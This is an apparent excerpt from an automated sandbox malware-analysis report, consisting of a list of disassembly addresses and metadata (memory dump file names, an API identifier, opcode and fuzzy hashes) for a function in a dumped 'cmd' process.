                                                    0x0225ecbd
                                                    0x00000000
                                                    0x0225eccc
                                                    0x0225eccc
                                                    0x0225ecd2
                                                    0x00000000
                                                    0x00000000
                                                    0x0225ecdf
                                                    0x0225ece0
                                                    0x0225ece4
                                                    0x0225eceb
                                                    0x0225ecee
                                                    0x0225eca8
                                                    0x0225eca8
                                                    0x0225ecaa
                                                    0x0222fd76
                                                    0x0222fd79
                                                    0x0222fdb4
                                                    0x0222fdb5
                                                    0x0222fdb6
                                                    0x00000000
                                                    0x0222fdb6
                                                    0x0222fd7e
                                                    0x0225ecfc
                                                    0x0222fe2f
                                                    0x00000000
                                                    0x0222fe2f
                                                    0x0225ed08
                                                    0x0225ed0f
                                                    0x0225ed17
                                                    0x0225ed1b
                                                    0x00000000
                                                    0x0225ed1b
                                                    0x0222fd88
                                                    0x00000000
                                                    0x00000000
                                                    0x0222fd94
                                                    0x0222fd99
                                                    0x0222fda1
                                                    0x00000000
                                                    0x00000000
                                                    0x0222fdb0
                                                    0x00000000
                                                    0x0222fdb0
                                                    0x0225ecbd
                                                    0x0222fdc7
                                                    0x0222fdcb
                                                    0x00000000
                                                    0x0222fdd7
                                                    0x0222fde3
                                                    0x0222fe06
                                                    0x02241fe7
                                                    0x00000000
                                                    0x00000000
                                                    0x02241fef
                                                    0x02241ff0
                                                    0x02241ff4
                                                    0x02241ff7
                                                    0x02241ffa
                                                    0x02241ffd
                                                    0x02242000
                                                    0x00000000
                                                    0x00000000
                                                    0x0225ecf1
                                                    0x00000000
                                                    0x0225ecf1
                                                    0x00000000
                                                    0x0222fe06
                                                    0x0222fde8
                                                    0x0222fdec
                                                    0x0222fdef
                                                    0x0222fdf2
                                                    0x00000000
                                                    0x0222fdf2
                                                    0x0222fdcb
                                                    0x0222fd04
                                                    0x0222fd05
                                                    0x0225ec67
                                                    0x00000000
                                                    0x00000000
                                                    0x0225ec6f
                                                    0x00000000
                                                    0x0225ec6f
                                                    0x0222fd13
                                                    0x0222fd3c
                                                    0x0222fd40
                                                    0x0225ec75
                                                    0x0225ec7a
                                                    0x00000000
                                                    0x0225ec8a
                                                    0x0225ec8a
                                                    0x0225ec90
                                                    0x0225ecb2
                                                    0x0222fd73
                                                    0x0222fd73
                                                    0x00000000
                                                    0x0222fd73
                                                    0x0225ec95
                                                    0x00000000
                                                    0x00000000
                                                    0x0225eca1
                                                    0x0225eca4
                                                    0x0225eca5
                                                    0x00000000
                                                    0x0225eca5
                                                    0x0225ec7a
                                                    0x0222fd4a
                                                    0x00000000
                                                    0x0222fd6e
                                                    0x0222fd6e
                                                    0x0222fd71
                                                    0x00000000
                                                    0x0222fd71
                                                    0x0222fd4a
                                                    0x0222fd21
                                                    0x0223a3a1
                                                    0x00000000
                                                    0x0223a3a1
                                                    0x0222fd36
                                                    0x0224200b
                                                    0x02242012
                                                    0x00000000
                                                    0x00000000
                                                    0x02242018
                                                    0x00000000
                                                    0x02242018
                                                    0x00000000
                                                    0x0222fd36
                                                    0x0222fe0f
                                                    0x0222fe16
                                                    0x0223a3ad
                                                    0x00000000
                                                    0x00000000
                                                    0x0223a3b3
                                                    0x0223a3b3
                                                    0x0222fe1f
                                                    0x0225ed25
                                                    0x0225ed86
                                                    0x00000000
                                                    0x00000000
                                                    0x0225ed91
                                                    0x0225ed95
                                                    0x0225ed95
                                                    0x0225ed9a
                                                    0x0225edad
                                                    0x0225edb3
                                                    0x0225edba
                                                    0x0225edc4
                                                    0x0225edc9
                                                    0x00000000
                                                    0x0225edcc
                                                    0x0225ed2a
                                                    0x0225ed55
                                                    0x00000000
                                                    0x00000000
                                                    0x0225ed61
                                                    0x0225ed66
                                                    0x0225ed6e
                                                    0x00000000
                                                    0x00000000
                                                    0x0225ed7d
                                                    0x00000000
                                                    0x0225ed7d
                                                    0x0225ed30
                                                    0x00000000
                                                    0x00000000
                                                    0x0225ed3c
                                                    0x0225ed43
                                                    0x0225ed4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.687168638.00000000021E0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: true
                                                    • Associated: 00000007.00000002.687160698.00000000021D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687257958.00000000022C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687263498.00000000022D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687269113.00000000022D4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687274473.00000000022D7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687279694.00000000022E0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000007.00000002.687321106.0000000002340000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_21d0000_cmd.jbxd
                                                    Similarity
                                                    • API ID: __fassign
                                                    • String ID:
                                                    • API String ID: 3965848254-0
                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction ID: aa123af848fae1f69e4302daccf16f3bda24eb7c1fff41e6021ee553a1aa6f81
                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                    • Instruction Fuzzy Hash: 6791B031D2022AFEDF25CFD8C9447AEB7B4EF40308F20806AD805A6559E7725B49CB81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%